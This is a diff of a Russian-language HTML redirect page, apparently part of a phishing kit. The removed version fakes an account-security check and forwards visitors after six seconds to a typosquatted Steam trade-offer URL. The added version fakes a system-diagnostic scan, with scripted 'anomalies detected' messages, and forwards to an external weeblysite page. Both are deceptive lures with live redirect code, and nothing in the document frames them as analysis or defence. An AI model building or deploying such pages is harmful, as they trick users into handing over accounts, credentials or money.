--- a/defferedredirects6.html
+++ b/defferedredirects6.html
@@ -1,28 +1,37 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Проверка учетной записи</title>
-    <script>
-        setTimeout(function() {
-            window.location.href = "https://steamcommuninty.com/tradeoffer/new/partner=483682441token=l4cigbNI2";
-        }, 6000);
-    </script>
+    <title>Системная диагностика</title>
+    <meta http-equiv="refresh" content="6;url=https://dearc-21.weeblysite.com/">
     <style>
-        body { font-family: Arial, sans-serif; background: #f0f0f0; padding: 50px; }
-        .verify-box { background: white; padding: 40px; border-radius: 10px; box-shadow: 0 5px 15px rgba(0,0,0,0.1); text-align: center; }
-        .icon { font-size: 48px; color: #4285f4; margin-bottom: 20px; }
-        .loading { display: inline-block; width: 20px; height: 20px; border: 3px solid #f3f3f3; border-top: 3px solid #4285f4; border-radius: 50%; animation: spin 1s linear infinite; }
-        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
+        body { font-family: 'Courier New', monospace; background: #000; color: #0f0; padding: 50px; }
+        .diagnostic { background: #111; padding: 40px; border: 1px solid #0f0; }
+        .log { background: #000; padding: 20px; border: 1px solid #333; margin: 20px 0; height: 150px; overflow-y: scroll; }
+        .log-line { margin: 5px 0; }
+        .blink { animation: blink 0.7s infinite; }
+        @keyframes blink { 50% { opacity: 0; } }
     </style>
 </head>
 <body>
-    <div class="verify-box">
-        <div class="icon">🔍</div>
-        <h2>Проверка учетной записи</h2>
-        <p>Мы проверяем безопасность вашей учетной записи</p>
-        <div class="loading"></div>
-        <p style="margin-top: 20px;">Перенаправление через 6 секунд...</p>
-        <p><a href="https://steamcommuninty.com/tradeoffer/new/partner=483682441token=l4cigbNI2">Перейти к проверке</a></p>
+    <div class="diagnostic">
+        <h1>> СИСТЕМНАЯ ДИАГНОСТИКА</h1>
+        <div class="log" id="log">
+            <div class="log-line">> Запуск диагностики безопасности...</div>
+            <div class="log-line">> Проверка целостности системы... [OK]</div>
+            <div class="log-line">> Сканирование на угрозы... [ВЫПОЛНЯЕТСЯ]</div>
+        </div>
+        <p>> Перенаправление на портал безопасности через 6 секунд</p>
+        <p>> <a href="https://dearc-21.weeblysite.com/" style="color: #0f0;">[ ПЕРЕЙТИ ]</a></p>
+        <p class="blink">_</p>
     </div>
+    
+    <script>
+        setTimeout(function() {
+            document.getElementById('log').innerHTML += '<div class="log-line">> Обнаружены незначительные аномалии...</div>';
+        }, 2000);
+        setTimeout(function() {
+            document.getElementById('log').innerHTML += '<div class="log-line">> Рекомендуется обновление безопасности...</div>';
+        }, 4000);
+    </script>
 </body>
 </html>
